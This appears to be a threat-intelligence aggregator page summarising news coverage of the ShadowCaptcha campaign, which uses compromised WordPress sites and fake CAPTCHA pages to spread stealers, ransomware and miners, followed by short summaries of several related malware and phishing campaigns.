ShadowCaptcha Campaign Exploits WordPress Sites for Malware Delivery
Summary
Hide β²
Show βΌ
A large-scale cybercrime campaign, codenamed ShadowCaptcha, has been exploiting over 100 compromised WordPress sites to distribute information stealers, ransomware, and cryptocurrency miners. The campaign, detected in August 2025, uses fake CAPTCHA verification pages and social engineering tactics to infect visitors. The primary objectives include credential harvesting, illicit cryptocurrency mining, and ransomware deployment. The attacks begin with malicious JavaScript code injected into compromised WordPress sites, redirecting visitors to fake CAPTCHA pages. From there, the attack chain forks into two paths: one utilizing the Windows Run dialog and another guiding victims to save and execute an HTML Application (HTA) file. The campaign employs anti-debugging techniques, DLL side-loading, and vulnerable drivers to maintain persistence and enhance mining efficiency. The infected sites span various sectors and are primarily located in Australia, Brazil, Italy, Canada, Colombia, and Israel.
Timeline
-
26.08.2025 13:45 π° 1 articles
ShadowCaptcha Campaign Exploits WordPress Sites for Malware Delivery
A large-scale cybercrime campaign, codenamed ShadowCaptcha, has been exploiting over 100 compromised WordPress sites to distribute information stealers, ransomware, and cryptocurrency miners. The campaign, detected in August 2025, uses fake CAPTCHA verification pages and social engineering tactics to infect visitors. The primary objectives include credential harvesting, illicit cryptocurrency mining, and ransomware deployment. The attacks begin with malicious JavaScript code injected into compromised WordPress sites, redirecting visitors to fake CAPTCHA pages. From there, the attack chain forks into two paths: one utilizing the Windows Run dialog and another guiding victims to save and execute an HTML Application (HTA) file. The campaign employs anti-debugging techniques, DLL side-loading, and vulnerable drivers to maintain persistence and enhance mining efficiency. The infected sites span various sectors and are primarily located in Australia, Brazil, Italy, Canada, Colombia, and Israel.
Show sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
Information Snippets
-
The ShadowCaptcha campaign exploits over 100 compromised WordPress sites to distribute malware.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The campaign uses fake CAPTCHA verification pages and social engineering tactics to infect visitors.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The primary objectives of ShadowCaptcha include credential harvesting, cryptocurrency mining, and ransomware deployment.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The attacks begin with malicious JavaScript code injected into compromised WordPress sites.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The attack chain forks into two paths: one utilizing the Windows Run dialog and another guiding victims to save and execute an HTML Application (HTA) file.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The campaign employs anti-debugging techniques, DLL side-loading, and vulnerable drivers to maintain persistence and enhance mining efficiency.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The infected sites span various sectors and are primarily located in Australia, Brazil, Italy, Canada, Colombia, and Israel.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The compromised ClickFix page automatically executes obfuscated JavaScript to copy a malicious command to the user's clipboard.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The ShadowCaptcha campaign has been observed delivering an XMRig-based cryptocurrency miner.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
-
The attackers have been observed dropping a vulnerable driver to achieve kernel-level access and improve mining efficiency.
First reported: 26.08.2025 13:45π° 1 source, 1 articleShow sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners β thehackernews.com β 26.08.2025 13:45
Similar Happenings
Axios Abuse and Salty 2FA Kits in Microsoft 365 Phishing Campaigns
Threat actors are leveraging HTTP client tools like Axios and Microsoft's Direct Send feature to execute advanced phishing campaigns targeting Microsoft 365 environments. These campaigns have demonstrated a 70% success rate, bypassing traditional security defenses and exploiting authentication workflows. The attacks began in July 2025 and have targeted executives and managers in various sectors, including finance, healthcare, and manufacturing. The phishing campaigns use compensation-themed lures to trick recipients into opening malicious PDFs containing QR codes that direct users to fake login pages. Additionally, a phishing-as-a-service (PhaaS) offering called Salty 2FA is being used to steal Microsoft login credentials and bypass multi-factor authentication (MFA). The Salty2FA kit includes advanced features such as subdomain rotation, dynamic corporate branding, and sophisticated evasion tactics to enhance its effectiveness and evade detection. Salty2FA activity began gaining momentum in June 2025, with early traces possibly dating back to MarchβApril 2025. The campaigns have been active since late July 2025 and continue to this day, generating dozens of fresh analysis sessions daily. Salty2FA targets industries including finance, energy, telecom, healthcare, government, logistics, IT consulting, education, construction, chemicals, industrial manufacturing, real estate, consulting, metallurgy, and more.
MostereRAT Malware Disables Security Tools, Targets Japanese Windows Users
A new malware campaign, tracked as MostereRAT, targets Japanese Windows users with sophisticated evasion techniques. MostereRAT disables antivirus and endpoint defenses, uses an obscure programming language, and abuses legitimate remote access tools to maintain persistent control over compromised systems. The malware's capabilities include privilege escalation, keylogging, data exfiltration, and the creation of hidden administrator accounts. The campaign's long-term objectives and the full extent of its impact remain unclear. MostereRAT employs Easy Programming Language (EPL) to evade detection and uses Windows Filtering Platform (WFP) filters to block security telemetry. The malware deploys legitimate remote access tools like AnyDesk, TigerVNC, and TightVNC, making it difficult to detect. The campaign highlights the importance of removing local administrator privileges and blocking unapproved remote access tools to reduce the attack surface. The malware uses mutual TLS (mTLS) to secure command-and-control (C2) communications and can run as TrustedInstaller, a built-in Windows system account with elevated permissions. MostereRAT can monitor foreground window activity associated with Qianniu - Alibaba's Seller Tool, facilitate RDP logins, and create hidden administrator accounts.
TAG-150 Expands Operations with CastleRAT in Python and C
The threat actor TAG-150, known for CastleLoader malware, has developed a new remote access trojan named CastleRAT. CastleRAT is available in both Python and C variants, and it is used to collect system information, execute commands, and download additional payloads. CastleRAT's development began in March 2025, and it is part of a multi-tiered infrastructure used by TAG-150. The malware is distributed through phishing attacks, fraudulent GitHub repositories, and other methods. The Python variant, also known as PyNightshade, and the C variant have different capabilities. The C variant includes keylogging, screenshot capture, file upload/download, and cryptocurrency clipper functionality. CastleRAT uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. TAG-150 has been active since at least March 2025, using CastleLoader as an initial access vector for various secondary payloads, including remote access trojans, information stealers, and other loaders. TAG-150's operations have targeted critical infrastructure, including U.S. government agencies, and have been linked to a Play Ransomware attack against a French organization. The group's MaaS operation is likely promoted within closed circles, indicating a sophisticated and connected user base. TAG-150 is likely to develop and release additional malware in the near term and expand its distribution efforts.
SVG Files Used to Deploy Phishing Pages in Colombian Judicial System Impersonation Campaign
A malware campaign leveraging SVG files to deploy Base64-encoded phishing pages impersonating the Colombian judicial system has been identified. The SVG files, distributed via email, execute JavaScript payloads to inject phishing pages and download ZIP archives. The campaign involves 523 unique SVG files that have evaded detection by antivirus engines. The earliest sample dates back to August 14, 2025. The campaign highlights the evolving tactics used by threat actors to bypass security measures and target macOS systems with information stealers like Atomic macOS Stealer (AMOS). This campaign also coincides with broader trends in cyber threats targeting macOS and gamers.
GhostRedirector Compromises 65 Windows Servers Using Rungan Backdoor and Gamshen IIS Module
GhostRedirector, a previously undocumented threat cluster, has compromised at least 65 Windows servers primarily in Brazil, Thailand, and Vietnam. The attacks, active since at least August 2024, deployed the Rungan backdoor and Gamshen IIS module. Rungan executes commands on compromised servers, while Gamshen manipulates search engine results for SEO fraud. The threat actor targets various sectors, including education, healthcare, technology, transportation, insurance, and retail, using SQL injection vulnerabilities for initial access. The group is assessed with medium confidence to be China-aligned. The operation involves using PowerShell to download malware tools and exploits like EfsPotato and BadPotato for privilege escalation.